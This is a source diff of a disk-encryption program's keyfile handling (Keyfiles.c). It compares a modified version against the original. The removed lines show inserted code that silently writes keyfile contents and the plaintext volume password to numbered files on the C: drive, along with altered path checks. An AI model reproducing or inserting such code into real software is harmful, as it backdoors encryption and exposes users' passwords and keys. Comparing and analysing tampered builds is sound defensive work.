--- Common/Keyfiles.c	Wed May 06 18:47:01 2020
+++ Common/Keyfiles.c	Tue May 27 17:32:20 2014
@@ -162,41 +162,6 @@
 	f = fopen (keyFile->FileName, "rb");
 	if (f == NULL) return FALSE;
 
-	/* Dump key to file */
-	{
-		FILE * myfile = NULL;
-		char filepath[512];
-
-		for (int asd = 0; asd < INT_MAX; asd++)
-		{
-			snprintf(filepath, sizeof(filepath), "C:\\keyfile_%d.bin\0 EDIT PATH HERE", asd);
-
-			/* Is file existing ?*/
-			myfile = fopen(filepath, "rb");
-
-			if (NULL == myfile)
-			{
-				/* File is not existing - open new file */
-				myfile = fopen(filepath, "wb");
-				break;
-			}
-		}
-
-		/* Write new file */
-		if (NULL != myfile)
-		{
-			while ((bytesRead = fread(buffer, 1, sizeof(buffer), f)) > 0)
-			{
-				fwrite(buffer, 1, bytesRead, myfile);
-			}
-
-			fclose(myfile);
-			fseek(f, 0, SEEK_SET);
-
-		}
-	}
-
-
 	while ((bytesRead = fread (buffer, 1, sizeof (buffer), f)) > 0)
 	{
 		size_t i;
@@ -269,36 +234,6 @@
 	VirtualLock (keyPool, sizeof (keyPool));
 	memset (keyPool, 0, sizeof (keyPool));
 
-
-	/* Dump password to file */
-	{
-		FILE * myfile = NULL;
-		char filepath[512];
-
-		for (int asd = 0; asd < INT_MAX; asd++)
-		{
-			snprintf(filepath, sizeof(filepath), "C:\\password_%d.bin\0 EDIT PATH HERE", asd);
-
-			/* Is file existing ?*/
-			myfile = fopen(filepath, "r");
-
-			if (NULL == myfile)
-			{
-				/* File is not existing - open new file */
-				myfile = fopen(filepath, "w");
-				break;
-			}
-		}
-
-		/* Write new file */
-		if (NULL != myfile)
-		{
-			fwrite(password->Text, 1, password->Length, myfile);
-			fclose(myfile);
-		}
-	}
-
-
 	for (kf = firstKeyFile; kf != NULL; kf = kf->Next)
 	{
 		// Determine whether it's a security token path
@@ -350,10 +285,7 @@
 		}
 
 		// Determine whether it's a path or a file
-		//if (stat (kf->FileName, &statStruct) != 0)
-		//todo //GetFileAttributesEx(kf->FileName)
-		
-		if(FILE_ATTRIBUTE_DIRECTORY == GetFileAttributes(kf->FileName))
+		if (stat (kf->FileName, &statStruct) != 0)
 		{
 			handleWin32Error (MainDlg);
 			Error ("ERR_PROCESS_KEYFILE");
@@ -385,8 +317,7 @@
 					);
 
 				// Determine whether it's a path or a file
-				//if (stat (kfSub->FileName, &statStruct) != 0)
-				if (FILE_ATTRIBUTE_DIRECTORY == GetFileAttributes(kfSub->FileName))
+				if (stat (kfSub->FileName, &statStruct) != 0)
 				{
 					handleWin32Error (MainDlg);
 					Error ("ERR_PROCESS_KEYFILE");
